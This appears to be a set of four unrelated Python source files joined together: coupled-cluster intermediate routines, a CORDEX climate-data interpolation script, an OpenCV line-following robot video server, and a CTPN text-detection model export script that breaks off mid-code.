    out = cc_Foo(t1,t2,eris) + einsum('kc,ic->ki',fov,t1)
    out += 2*einsum('kilc,lc->ki',eris.ooov,t1)
    out -= einsum('likc,lc->ki',eris.ooov,t1)
    return out
def Lvv(t1,t2,eris):
    """Virtual-virtual lambda intermediate L_ac (Eq. 41, Hirata 2004)."""
    nocc, nvir = t1.shape
    fov = eris.fock[:nocc,nocc:]
    out = cc_Fvv(t1,t2,eris) - einsum('kc,ka->ac',fov,t1)
    # ovvv integrals are triangular-packed; unpack to a 4-index array
    ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
    out += 2*einsum('kdac,kd->ac',ovvv,t1)
    out -= einsum('kcad,kd->ac',ovvv,t1)
    return out
### Eqs. (42)-(45) "chi"
def cc_Woooo(t1,t2,eris):
    """chi intermediate W_klij (Eq. 42, Hirata 2004)."""
    out = np.array(eris.oooo).transpose(0,2,1,3).copy()
    out += einsum('kilc,jc->klij',eris.ooov,t1)
    out += einsum('ljkc,ic->klij',eris.ooov,t1)
    out += einsum('kcld,ijcd->klij',eris.ovov,t2)
    out += einsum('kcld,ic,jd->klij',eris.ovov,t1,t1)
    return out
def cc_Wvvvv(t1,t2,eris):
    """chi intermediate W_abcd (Eq. 43, Hirata 2004).

    Built one a-slice at a time into an HDF5 scratch dataset so the full
    nvir^4 array never has to live in memory.  Returns the h5py dataset.
    """
    # BUG FIX: np.complex was deprecated in NumPy 1.20 and removed in 1.24;
    # np.iscomplexobj covers the same (and the complex64) case.
    if np.iscomplexobj(t1): ds_type = 'c16'
    else: ds_type = 'f8'
    _tmpfile1 = tempfile.NamedTemporaryFile(dir=lib.param.TMPDIR)
    # BUG FIX: h5py >= 3 requires an explicit mode; 'w' creates/truncates
    # the scratch file, matching the old default behavior.
    fimd = h5py.File(_tmpfile1.name, 'w')
    nocc,nvir = t1.shape
    Wabcd = fimd.create_dataset('vvvv', (nvir,nvir,nvir,nvir), ds_type)
    # avoid transpose inside loop
    eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
    ovvv = np.array(eris_ovvv).transpose(0,2,1,3)
    for a in range(nvir):
        w_vvv = einsum('kdc,kb->bcd',eris_ovvv[:,:,a,:],-t1)
        w_vvv -= einsum('k,kbcd->bcd',t1[:,a],ovvv)
        # eris.vvvv stores only the lower triangle of the (a,b) pair index;
        # unpack row a and the remaining column entries separately.
        a0 = a*(a+1)//2
        w_vvv[:,:a+1] += lib.unpack_tril(eris.vvvv[a0:a0+a+1]).transpose(1,0,2)
        for i in range(a+1,nvir):
            w_vvv[:,i] += lib.unpack_tril(eris.vvvv[i*(i+1)//2+a])
        Wabcd[a] = w_vvv
    return Wabcd
def cc_Wvoov(t1,t2,eris):
    """chi intermediate W_akic (Eq. 44, Hirata 2004)."""
    nocc, nvir = t1.shape
    ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
    out = np.array(eris.ovvo).transpose(1,3,0,2)
    out -= einsum('likc,la->akic',eris.ooov,t1)
    out += einsum('kcad,id->akic',ovvv,t1)
    out -= 0.5*einsum('ldkc,ilda->akic',eris.ovov,t2)
    out -= einsum('ldkc,id,la->akic',eris.ovov,t1,t1)
    out += einsum('ldkc,ilad->akic',eris.ovov,t2)
    out -= 0.5*einsum('lckd,ilad->akic',eris.ovov,t2)
    return out
def cc_Wvovo(t1,t2,eris):
    """chi intermediate W_akci (Eq. 45, Hirata 2004)."""
    nocc, nvir = t1.shape
    ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
    out = np.array(eris.oovv).transpose(2,0,3,1)
    out -= einsum('kilc,la->akci',eris.ooov,t1)
    out += einsum('kdac,id->akci',ovvv,t1)
    out -= 0.5*einsum('lckd,ilda->akci',eris.ovov,t2)
    out -= einsum('lckd,id,la->akci',eris.ovov,t1,t1)
    return out
def Wooov(t1,t2,eris):
    """W_klid: bare ooov integrals plus the t1 dressing."""
    out = np.asarray(eris.ooov).transpose(0,2,1,3)
    out = out + einsum('ic,kcld->klid',t1,eris.ovov)
    return out
def Wvovv(t1,t2,eris):
    """W_alcd: transposed ovvv integrals minus the t1 dressing."""
    nocc, nvir = t1.shape
    ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
    return ovvv.transpose(2,0,3,1) - einsum('ka,kcld->alcd',t1,eris.ovov)
def W1ovvo(t1,t2,eris):
    """t2-dressed part of the W_kaci intermediate."""
    out = np.array(eris.ovvo).transpose(3,1,2,0)
    out += 2*einsum('kcld,ilad->kaci',eris.ovov,t2)
    out -= einsum('kcld,liad->kaci',eris.ovov,t2)
    out -= einsum('kdlc,ilad->kaci',eris.ovov,t2)
    return out
def W2ovvo(t1,t2,eris):
    """t1-dressed part of the W_kaci intermediate."""
    nocc, nvir = t1.shape
    ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
    out = einsum('la,lkic->kaci',-t1,Wooov(t1,t2,eris))
    out += einsum('kcad,id->kaci',ovvv,t1)
    return out
def Wovvo(t1,t2,eris):
    """Full W_kaci = W1ovvo + W2ovvo."""
    return W1ovvo(t1,t2,eris) + W2ovvo(t1,t2,eris)
def W1ovov(t1,t2,eris):
    """t2-dressed part of the W_kbid intermediate."""
    out = np.array(eris.oovv).transpose(0,2,1,3)
    out -= einsum('kcld,ilcb->kbid',eris.ovov,t2)
    return out
def W2ovov(t1,t2,eris):
    """t1-dressed part of the W_kbid intermediate."""
    nocc, nvir = t1.shape
    ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
    out = einsum('klid,lb->kbid',Wooov(t1,t2,eris),-t1)
    out += einsum('kcbd,ic->kbid',ovvv,t1)
    return out
def Wovov(t1,t2,eris):
    """Full W_kbid = W1ovov + W2ovov."""
    out = W1ovov(t1,t2,eris)
    out += W2ovov(t1,t2,eris)
    return out
def Woooo(t1,t2,eris):
    """Full W_klij intermediate (t1- and t2-dressed oooo integrals)."""
    out = np.array(eris.oooo).transpose(0,2,1,3).copy()
    out += einsum('kcld,ijcd->klij',eris.ovov,t2)
    out += einsum('kcld,ic,jd->klij',eris.ovov,t1,t1)
    out += einsum('kild,jd->klij',eris.ooov,t1)
    out += einsum('ljkc,ic->klij',eris.ooov,t1)
    return out
def Wvvvv(t1,t2,eris):
    """Full W_abcd intermediate, built slice-by-slice into an HDF5
    scratch dataset (the in-memory array would be nvir^4).  Returns
    the h5py dataset."""
    # BUG FIX: np.complex was deprecated in NumPy 1.20 and removed in 1.24;
    # np.iscomplexobj covers the same (and the complex64) case.
    if np.iscomplexobj(t1): ds_type = 'c16'
    else: ds_type = 'f8'
    _tmpfile1 = tempfile.NamedTemporaryFile(dir=lib.param.TMPDIR)
    # BUG FIX: h5py >= 3 requires an explicit mode; 'w' creates/truncates
    # the scratch file, matching the old default behavior.
    fimd = h5py.File(_tmpfile1.name, 'w')
    nocc,nvir = t1.shape
    Wabcd = fimd.create_dataset('vvvv', (nvir,nvir,nvir,nvir), ds_type)
    eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
    for a in range(nvir):
        w_vvv = einsum('ldc,lb->bcd',eris_ovvv[:,:,a,:],-t1)
        w_vvv += einsum('kcbd,k->bcd',eris_ovvv,-t1[:,a])
        w_vvv += einsum('kcld,klb->bcd',eris.ovov,t2[:,:,a,:])
        w_vvv += einsum('kcld,k,lb->bcd',eris.ovov,t1[:,a],t1)
        # eris.vvvv stores only the lower triangle of the (a,b) pair index;
        # unpack row a and the remaining column entries separately.
        a0 = a*(a+1)//2
        w_vvv[:,:a+1] += lib.unpack_tril(eris.vvvv[a0:a0+a+1]).transpose(1,0,2)
        for i in range(a+1,nvir):
            w_vvv[:,i] += lib.unpack_tril(eris.vvvv[i*(i+1)//2+a])
        Wabcd[a] = w_vvv
    return Wabcd
def Wvvvo(t1,t2,eris,_Wvvvv=None):
    """W_abcj intermediate.

    _Wvvvv may be passed in to reuse a precomputed Wvvvv dataset; it is
    only needed (and only built) when t1 is nonzero.
    """
    # fixed: the original assigned `nocc, nvir = t1.shape` twice in a row
    nocc, nvir = t1.shape
    eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
    Wabcj = np.array(eris_ovvv).transpose(3,1,2,0).conj()
    # Check if t1=0 (HF+MBPT(2))
    # einsum will check, but don't make vvvv if you can avoid it!
    if np.any(t1):
        if _Wvvvv is None:
            _Wvvvv = Wvvvv(t1,t2,eris)
        # contract slice-by-slice: _Wvvvv may be an HDF5 dataset
        for a in range(nvir):
            Wabcj[a] += einsum('bcd,jd->bcj',_Wvvvv[a],t1)
    Wabcj += -einsum('alcj,lb->abcj',W1ovov(t1,t2,eris).transpose(1,0,3,2),t1)
    Wabcj += -einsum('kbcj,ka->abcj',W1ovvo(t1,t2,eris),t1)
    Wabcj += 2*einsum('ldac,ljdb->abcj',eris_ovvv,t2)
    Wabcj += -einsum('ldac,ljbd->abcj',eris_ovvv,t2)
    Wabcj += -einsum('lcad,ljdb->abcj',eris_ovvv,t2)
    Wabcj += -einsum('kcbd,jkda->abcj',eris_ovvv,t2)
    Wabcj += einsum('ljkc,lkba->abcj',eris.ooov,t2)
    Wabcj += einsum('ljkc,lb,ka->abcj',eris.ooov,t1,t1)
    Wabcj += -einsum('kc,kjab->abcj',cc_Fov(t1,t2,eris),t2)
    return Wabcj
def Wovoo(t1,t2,eris):
    """W_kbij intermediate."""
    nocc, nvir = t1.shape
    ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
    out = np.array(eris.ooov).transpose(1,3,0,2).conj()
    out += einsum('kbid,jd->kbij',W1ovov(t1,t2,eris),t1)
    out -= einsum('klij,lb->kbij',Woooo(t1,t2,eris),t1)
    out += einsum('kbcj,ic->kbij',W1ovvo(t1,t2,eris),t1)
    out += 2*einsum('kild,ljdb->kbij',eris.ooov,t2)
    out -= einsum('kild,jldb->kbij',eris.ooov,t2)
    out -= einsum('likd,ljdb->kbij',eris.ooov,t2)
    out += einsum('kcbd,jidc->kbij',ovvv,t2)
    out += einsum('kcbd,jd,ic->kbij',ovvv,t1,t1)
    out -= einsum('ljkc,libc->kbij',eris.ooov,t2)
    out += einsum('kc,ijcb->kbij',cc_Fov(t1,t2,eris),t2)
    return out
|
'''usage: python cordexabel.py ncpath lname llon llat lalt prefix n onlygeog
with default values for prefix = . and n = 500.
'''
import sys
import os
import numpy as np
import netCDF4
import datetime
import time
sys.path.append('/cluster/home/kojito/lib/python/site-packages')
import geopy.distance
myfmt = '%.8f' ## 8 significant digits, e.g., 53.80798340
nstats = 42  # NOTE(review): appears to be the expected column count of the R results — confirm
# RCMModelName.txt maps each RCM model name to its institute; lines
# starting with '#' are comments.
with open('RCMModelName.txt') as f:
    RCMlist = [l.rstrip().split()[:2] for l in f.readlines() if not l[0] == '#']
RCMdict = dict(RCMlist)
def parsefn(fn, prefix = '.'):
    '''parses the cordex file name and returns
    (the directory path, VariableName, StartTime, EndTime)
    StartTime and EndTime are None if Frequency is not day'''
    assert fn[-3:] == '.nc', 'the file name has to have .nc'
    parts = fn.strip()[:-3].split('_')
    variable = parts[0]
    domain = parts[1]
    gcm = parts[2]
    experiment = parts[3]
    ensemble = parts[4]
    rcm = parts[5]
    try:
        institute = RCMdict[rcm]
    except KeyError:
        sys.exit('RCM Model name not found')
    version = parts[6]
    frequency = parts[7]
    start = end = None
    if frequency == 'day':
        start, end = parts[8].split('-')
    dirpath = os.path.join(prefix, domain, institute, gcm, experiment,
                           ensemble, rcm, version, frequency, variable)
    return (dirpath, variable, start, end)
def getorogfn(fn):
    '''returns the corresponding orography .nc file name'''
    assert fn[-3:] == '.nc', 'the file name has to have .nc'
    parts = fn.strip()[:-3].split('_')
    # keep Domain/GCM/Experiment/Ensemble/RCM/Version (fields 1..6),
    # replace the variable with 'orog' and the frequency with 'fx'
    return '_'.join(['orog'] + parts[1:7] + ['fx']) + '.nc'
def writegeog(orogfn, dirname, lname, llat, llon, n, dummy = False):
    '''extracts geographical information (longitude, latitude, altitude)
    from orography .nc file.
    Writes 3 files in dirname. "near-LOCATION-altitude.txt.gz" etc.
    (with dummy=True only the nearest-vertex mask is computed; nothing
    is written except that dirname is still created).
    It also returns tuple of 4 elements:
    1) the boolean ndarray isnearby, the nearest n vertices being True
    2) latpath
    3) lonpath
    4) altpath
    '''
    latfn = 'near-%s_latitude.txt.gz' % lname
    latpath = os.path.join(dirname, latfn)
    lonfn = 'near-%s_longitude.txt.gz' % lname
    lonpath = os.path.join(dirname, lonfn)
    altfn = 'near-%s_altitude.txt.gz' % lname
    altpath = os.path.join(dirname, altfn)
    # distfn = 'near_%s-distance.txt.gz' % lname
    # distpath = os.path.join(dirname, distfn)
    r = netCDF4.Dataset(orogfn)
    lon = r.variables['lon'][:, :].flatten()
    lat = r.variables['lat'][:, :].flatten()
    # great-circle distance from the target location to every grid vertex
    dist = np.array([geopy.distance.great_circle((llat, llon), (la, lo)).km
                     for lo, la in zip(lon.tolist(), lat.tolist())])
    ## get the rank
    temp = dist.argsort()
    ranks = np.empty(len(dist), int)
    ranks[temp] = np.arange(len(dist)) # smaller number closer to the loc
    isnearby = ranks < n
    if not os.path.exists(dirname): os.makedirs(dirname)
    if not dummy:
        orog = r.variables['orog'][:, :].flatten()
        print('[cordexabel.writegeog()] writing to %s' % lonpath)
        np.savetxt(lonpath, lon[isnearby], fmt = myfmt)
        print('[cordexabel.writegeog()] writing to %s' % latpath)
        np.savetxt(latpath, lat[isnearby], fmt = myfmt)
        print('[cordexabel.writegeog()] writing to %s' % altpath)
        np.savetxt(altpath, orog[isnearby], fmt = '%.2f')
        # np.savetxt(distpath, dist[isnearby], fmt = myfmt)
    r.close()
    return (isnearby, latpath, lonpath, altpath)
def spinterp(ncpath, lname, llat, llon, lalt, prefix = '.', n = 500):
    '''runs the spatial interpolation Rscript for all data along time unit
    in ncfn, using the geography files (see writegeog()) in the directory
    parsefn(getorogfn(ncfn), '.')[0],
    with the prediction at a new location with longitude (llon),
    latitude (llat) and altitude (lalt), and write outputs in
    os.path.join(parsefn(ncfn, '.')[0], lname).
    llat, llon, lalt: float
    It will create necessary directories.'''
    ncdir, ncfn = os.path.split(ncpath)
    orogfn = getorogfn(ncfn)
    orogpath = os.path.join(ncdir, orogfn)
    outdir, VariableName, StartTime, EndTime = parsefn(ncfn, prefix)
    if not os.path.exists(outdir): os.makedirs(outdir)
    print('[cordexabel.py] orogpath is %s' % orogpath)
    if not os.path.exists(orogpath):
        # the exact orog file is missing: fall back to any file in the same
        # directory sharing the first 4 and last 3 name fields
        print('[cordexabel.py] orogpath does not exist')
        pref = '_'.join(orogfn.split('_')[:4])
        suff = '_'.join(orogfn.split('_')[-3:])
        filelist = os.listdir(ncdir)
        alternatives = [f for f in filelist if pref in f and suff in f]
        if len(alternatives) > 0:
            print('[cordexabel.py] found %s instead' % alternatives[0])
            orogfn = alternatives[0]
            orogpath = os.path.join(ncdir, orogfn)
        else:
            sys.exit('[cordexabel.py] ERROR: could not find the orog file')
    geogdir = parsefn(orogfn, prefix)[0]
    # dummy=True: only the nearest-n mask and the geog file paths are
    # computed here; the geog files themselves are assumed to exist already
    isnearby, latpath, lonpath, altpath = \
        writegeog(orogpath, geogdir, lname, llat, llon, n, dummy = True)
    # NOTE(review): a large disabled block used to validate/regenerate the
    # geog files (completeness checks on lat/lon/alt files, then a
    # writegeog(dummy=False) call); it has been commented out upstream.
    # writes 3 .txt.gz files
    txtgzpath = os.path.join(outdir, 'near-%s_%s.txt.gz' % (
        lname, os.path.splitext(ncfn)[0]))
    r = netCDF4.Dataset(ncpath)
    v = r.variables[VariableName]
    t, y, x = v.shape
    print('[cordexabel.py] writing variable file from the .nc file...')
    # flatten the spatial grid and keep only the n nearest vertices
    np.savetxt(txtgzpath, v[:, :, :].reshape((t, y * x))[:, isnearby], fmt = myfmt)
    r.close()
    resultspath = os.path.join(outdir, 'interpolated', lname,
                               'interpolated-%s_%s.txt.gz' % (
                                   lname, os.path.splitext(ncfn)[0]))
    resultsdir = os.path.dirname(resultspath)
    do_interp_flag = True
    if not os.path.exists(resultsdir): os.makedirs(resultsdir)
    # NOTE(review): another disabled block used to skip interpolation when
    # an already-complete results file (n_days rows x nstats cols) exists.
    if do_interp_flag:
        print('[cordexabel.py] interpolating -- calling R...')
        ## usage: Rscript spinterp_cordex.R --args \
        ##        lonpath latpath orogpath varpath llon llat lalt resultspath
        command = '%s \\\n%s \\\n%s \\\n%s \\\n%s \\\n%s %s %s \\\n%s' % (
            'Rscript spinterp_cordex.R --args',
            lonpath, latpath, altpath, txtgzpath, llon, llat, lalt, resultspath)
        print(command)
        os.system(command)
    # the temporary variable dump is deleted once R has consumed it
    os.unlink(txtgzpath)
if __name__ == '__main__':
    # usage: python cordexabel.py ncpath lname llon llat lalt [prefix] [n] [onlygeog]
    a = sys.argv
    ncpath = a[1]
    lname = a[2]
    # NOTE(review): llon/llat/lalt stay strings here and are forwarded as-is —
    # confirm downstream (geopy / the R command line) accepts them.
    llon = a[3]
    llat = a[4]
    lalt = a[5]
    prefix = '.' if len(a) <= 6 else a[6]
    n = 500 if len(a) <= 7 else int(a[7])
    # BUG FIX: bool(a[8]) was True for ANY non-empty argument, including
    # "False" and "0"; parse the flag text instead.
    onlygeog = False if len(a) <= 8 else a[8].lower() in ('1', 'true', 'yes')
    if onlygeog:
        print('[cordexabel.py] creating geog files only')
        ncdir, ncfn = os.path.split(ncpath)
        orogfn = getorogfn(ncfn)
        orogpath = os.path.join(ncdir, orogfn)
        geogdir = parsefn(orogfn, prefix)[0]
        outdir, VariableName, StartTime, EndTime = parsefn(ncfn, prefix)
        if not os.path.exists(outdir): os.makedirs(outdir)
        print('[cordexabel.py] orogpath is %s' % orogpath)
        if not os.path.exists(orogpath):
            # fall back to any file sharing the first 4 / last 3 name fields
            print('[cordexabel.py] orogpath does not exist')
            pref = '_'.join(orogfn.split('_')[:4])
            suff = '_'.join(orogfn.split('_')[-3:])
            filelist = os.listdir(ncdir)
            alternatives = [f for f in filelist if pref in f and suff in f]
            if len(alternatives) > 0:
                print('[cordexabel.py] found %s instead' % alternatives[0])
                orogfn = alternatives[0]
                orogpath = os.path.join(ncdir, orogfn)
            else:
                sys.exit('[cordexabel.py] ERROR: could not find the orog file')
        isnearby, latpath, lonpath, altpath = \
            writegeog(orogpath, geogdir, lname, llat, llon, n, dummy = False)
    else:
        spinterp(ncpath, lname, llat, llon, lalt, prefix, n)
|
import numpy as np
import cv2
import socket
class videoStreaming(object):
    # Receives an MJPEG stream over TCP, runs a simple line-following
    # pipeline on each frame, and sends steering commands ("1"/"2"/"3")
    # back over the same connection.
    def __init__(self, host, port):
        # Listen, accept a single client, then immediately start streaming.
        # NOTE: the constructor blocks in accept() and then in stream().
        self.serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # server socket
        self.serverSocket.bind((host, port))  # binds the host ip with port
        self.serverSocket.listen(0)
        self.connection, self.clientAddress = self.serverSocket.accept()
        self.connectionBuff = self.connection.makefile('rb')
        self.hostName = socket.gethostname()
        self.hostIp = socket.gethostbyname(self.hostName)
        self.stream()
    def stream(self):
        # Main receive/processing loop; always closes the sockets on exit.
        try:
            print(f'Host: {self.hostName}, {self.hostIp}')
            print(f'Connection from: {self.clientAddress}')
            print("Streaming video now...")
            print("Press 'q' to exit!")
            # need bytes here
            stream_bytes = b' '
            while True:
                stream_bytes += self.connectionBuff.read(1024)
                # JPEG frames are delimited by SOI (ff d8) / EOI (ff d9)
                first = stream_bytes.find(b'\xff\xd8')
                last = stream_bytes.find(b'\xff\xd9')
                if first != -1 and last != -1:
                    jpg = stream_bytes[first:last + 2]
                    stream_bytes = stream_bytes[last + 2:]
                    image = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)
                    cv2.imshow('Video', image)
                    # bottom half of a 320x240 frame is the region of interest
                    roi = image[120:240, 0:320]
                    grey_img = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
                    blur = cv2.GaussianBlur(grey_img, (5, 5), 0)
                    # inverse threshold: the (dark) line becomes white
                    ret, thresh = cv2.threshold(blur, 60, 255, cv2.THRESH_BINARY_INV)
                    imgErosion = cv2.erode(thresh, None, iterations=2)
                    imgDilation = cv2.dilate(imgErosion, None, iterations=2)
                    contours, hierarchy = cv2.findContours(imgDilation.copy(), 1, cv2.CHAIN_APPROX_NONE)
                    if len(contours) > 0:
                        try:
                            # steer toward the centroid of the largest contour
                            c = max(contours, key=cv2.contourArea)
                            M = cv2.moments(c)
                            cx = int(M['m10'] / M['m00'])
                            cy = int(M['m01'] / M['m00'])
                            cv2.line(roi, (cx, 0), (cx, 720), (255, 0, 0), 1)
                            cv2.line(roi, (0, cy), (1280, cy), (255, 0, 0), 1)
                            cv2.drawContours(roi, contours, -1, (0, 255, 0), 1)
                            self.robot(cx)
                        except Exception as e:
                            # m00 == 0 (degenerate contour) raises ZeroDivisionError
                            print(f'Moments error: {e}')
                    else:
                        print("Can't see nothing!")
                    cv2.imshow('Frame', roi)
                    if cv2.waitKey(1) & 0xFF == ord('q'):
                        break
        finally:
            self.connection.close()
            self.serverSocket.close()
    def robot(self, cx):
        # Map the contour centroid's x position to a steering command:
        # >=220 right, 100<x<220 forward, <=100 left.
        centroidx = cx
        if centroidx >= 220:
            self.connection.send(bytes("3", 'utf-8'))
            print("3 - Right")
        elif centroidx < 220 and cx > 100:
            self.connection.send(bytes("1", "utf-8"))
            print("1 - Forward")
        elif centroidx <= 100:
            self.connection.send(bytes("2", "utf-8"))
            print("2 - Left")
        else:
            # unreachable for real numbers; kept as a defensive fallback
            print("Error in Calculation!")
if __name__ == '__main__':
    # host, port of the Local machine
    h, p = "192.168.1.67", 8000
    # blocks: the constructor accepts one client and streams until 'q'
    videoStreaming(h, p)
|
<reponame>kspook/text-detection-ctpn01
from __future__ import print_function
import tensorflow as tf
import numpy as np
import os, sys, cv2
from tensorflow.python.platform import gfile
import glob
import shutil
dir_path = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(dir_path, '..'))
from lib.networks.factory import get_network
from lib.fast_rcnn.config import cfg, cfg_from_file
from lib.fast_rcnn.test import test_ctpn
from lib.utils.timer import Timer
from lib.text_connector.detectors import TextDetector
from lib.text_connector.text_connect_cfg import Config as TextLineCfg
from lib.fast_rcnn.test import _get_blobs
from lib.rpn_msr.proposal_layer_tf import proposal_layer
dir_path = os.path.dirname(os.path.realpath(__file__))
def resize_im(im, scale, max_scale=None):
    """Scale an image so that its shorter side becomes ``scale`` pixels.

    If ``max_scale`` is given and the scaled longer side would exceed it,
    the factor is reduced so the longer side equals ``max_scale`` instead.

    Args:
        im: image as a numpy array of shape (H, W[, C]).
        scale: target length (pixels) for the shorter side.
        max_scale: optional cap (pixels) for the longer side.

    Returns:
        Tuple of (resized image, applied scaling factor ``f``).
    """
    f = float(scale) / min(im.shape[0], im.shape[1])
    # Compare against None with an identity check (PEP 8), not `!=`.
    if max_scale is not None and f * max(im.shape[0], im.shape[1]) > max_scale:
        f = float(max_scale) / max(im.shape[0], im.shape[1])
    return cv2.resize(im, None, None, fx=f, fy=f, interpolation=cv2.INTER_LINEAR), f
def preprocess_image(image_buffer):
    """Preprocess JPEG encoded bytes to 3D float Tensor."""
    # Decode the string as an RGB JPEG.
    # Note that the resulting image contains an unknown height and width
    # that is set dynamically by decode_jpeg. In other words, the height
    # and width of image is unknown at compile-time.
    image = tf.image.decode_image(image_buffer, channels=3)
    # NOTE(review): decode_image(channels=3) yields a rank-3 tensor for
    # JPEG/PNG input, yet a 4-element static shape is asserted here
    # ([256, 256, 256, 3]); that combination looks inconsistent — confirm
    # the intended shape (e.g. [256, 256, 3] or [None, None, 3]).
    image.set_shape([256, 256, 256,3])
    # self.img_pl = tf.placeholder(tf.string, name='input_image_as_bytes')
    # After this point, all image pixels reside in [0,1)
    # until the very end, when they're rescaled to (-1, 1). The various
    # adjust_* ops all require this range for dtype float.
    image = tf.image.convert_image_dtype(image, dtype=tf.float32)
    # Crop the central region of the image with an area containing 87.5% of
    # the original image.
    image = tf.image.central_crop(image, central_fraction=0.875)
    # NOTE(review): expand_dims immediately followed by squeeze on the same
    # axis is a no-op; presumably left over from a batched variant.
    image = tf.expand_dims(image, 0)
    image = tf.squeeze(image, [0])
    # Finally, rescale to [-1,1] instead of [0, 1)
    image = tf.subtract(image, 0.5)
    image = tf.multiply(image, 2.0)
    return image
def query_ctpn(sess, cv2img):
    """Run CTPN text detection on an image.

    Args:
        sess: tensorflow session holding the imported frozen CTPN graph
        cv2img: numpy array image (BGR, as read by cv2)

    Returns:
        A list of detected bounding boxes, each expressed as the pair of
        corner coordinates [(xmin, ymin), (xmax, ymax)].
    """
    # Look up the graph's input placeholder and the two output tensors.
    input_img = sess.graph.get_tensor_by_name('Placeholder:0')
    output_cls_box = sess.graph.get_tensor_by_name('Reshape_2:0')
    output_box_pred = sess.graph.get_tensor_by_name('rpn_bbox_pred/Reshape_1:0')
    # Resize to the configured working scale, then build the network blobs.
    img, scale = resize_im(cv2img, scale=TextLineCfg.SCALE, max_scale=TextLineCfg.MAX_SCALE)
    blobs, im_scales = _get_blobs(img, None)
    if cfg.TEST.HAS_RPN:
        im_blob = blobs['data']
        blobs['im_info'] = np.array(
            [[im_blob.shape[1], im_blob.shape[2], im_scales[0]]],
            dtype=np.float32)
    # Forward pass: class probabilities + box regression deltas.
    cls_prob, box_pred = sess.run(
        [output_cls_box, output_box_pred],
        feed_dict={input_img: blobs['data']})
    print('box_pred, ', box_pred )
    rois, _ = proposal_layer(cls_prob, box_pred, blobs['im_info'],
                             'TEST', anchor_scales=cfg.ANCHOR_SCALES)
    print('rois, ', rois)
    # Column 0 holds the score; columns 1..4 the box, mapped back to the
    # resized-image coordinate frame.
    scores = rois[:, 0]
    boxes = rois[:, 1:5] / im_scales[0]
    textdetector = TextDetector()
    print('textDetector, ', textdetector )
    boxes = textdetector.detect(boxes, scores[:, np.newaxis], img.shape[:2])
    print('boxes=textdetector, ', boxes )
    # Collapse each 8-coordinate quadrilateral into an axis-aligned
    # rectangle in original-image coordinates (undo the resize scale).
    rects = []
    for box in boxes:
        xs = [int(box[i] / scale) for i in (0, 2, 4, 6)]
        ys = [int(box[i] / scale) for i in (1, 3, 5, 7)]
        rects.append([(min(xs), min(ys)), (max(xs), max(ys))])
        print('rects.append, ', rects)
    return rects
def export():
    """Export the frozen CTPN graph as a TensorFlow SavedModel.

    Two sessions are used: ``ctpn_sess`` runs a detection on a demo image,
    and a second session re-imports the graph with a serialized-Example
    input pipeline and writes it out via SavedModelBuilder.
    """
    cfg_from_file(os.path.join(dir_path, 'text_post.yml'))
    config = tf.ConfigProto(allow_soft_placement=True)
    ctpn_sess = tf.Session(config=config)
    # --- Session 1 of 2: load the frozen graph and initialize it. ---
    with ctpn_sess.as_default():
        with tf.gfile.FastGFile('../data/ctpn.pb', 'rb') as f:
            graph_def = tf.GraphDef()
            graph_def.ParseFromString(f.read())
            ctpn_sess.graph.as_default()
            tf.import_graph_def(graph_def, name='')
            ctpn_sess.run(tf.global_variables_initializer())
    # Run detection once on a demo image; the resulting boxes are attached
    # to the SavedModel signature below.
    cv2img = cv2.imread("../data/demo/006.jpg", cv2.IMREAD_COLOR)
    result_boxes=query_ctpn(ctpn_sess, cv2img)
    print('Creating boxes done')
    '''
    No 2 Sess outf of 2:sess
    '''
    # --- Session 2 of 2: rebuild the graph for export. ---
    with tf.Session() as sess:
        with gfile.FastGFile('../data/ctpn.pb', 'rb') as f:
            restored_graph_def = tf.GraphDef()
            restored_graph_def.ParseFromString(f.read())
            tf.import_graph_def(
                restored_graph_def,
                input_map=None,
                return_elements=None,
                name=""
            )
        '''
        export_path_base = args.export_model_dir
        export_path = os.path.join(tf.compat.as_bytes(export_path_base),
                                   tf.compat.as_bytes(str(args.model_version)))
        '''
        builder = tf.saved_model.builder.SavedModelBuilder('../exportPo/1')
        #print('Exporting trained model to', export_path)
        print('Exporting trained model ')
        # Serving input: a serialized tf.Example containing JPEG bytes under
        # the 'image/encoded' feature key.
        raw_image = tf.placeholder(tf.string, name='tf_box')
        feature_configs = {
            'image/encoded': tf.FixedLenFeature(
                shape=[], dtype=tf.string),
        }
        tf_example = tf.parse_example(raw_image , feature_configs)
        jpegs = tf_example['image/encoded']
        image_string = tf.reshape(jpegs, shape=[])
        jpeg= preprocess_image(image_string)
        print('jpeg,jpeg.shape[]', jpeg, jpeg.shape)
        # Re-import the graph wiring the preprocessed image into the CTPN
        # input placeholder, and pull out the two detection outputs.
        output_tensor_cls_prob,output_tensor_box_pred = tf.import_graph_def\
            (tf.get_default_graph().as_graph_def(),
             input_map={'Placeholder:0': jpeg},
             return_elements=['Reshape_2:0','rpn_bbox_pred/Reshape_1:0'])
        tensor_info_input = tf.saved_model.utils.build_tensor_info(raw_image)
        tensor_info_output_cls_prob = tf.saved_model.utils.build_tensor_info(output_tensor_cls_prob)
        tensor_info_output_box_pred = tf.saved_model.utils.build_tensor_info(output_tensor_box_pred)
        '''
        #crop_resize_img,crop_resize_im_info = resize_im(cv2img, result_boxes)
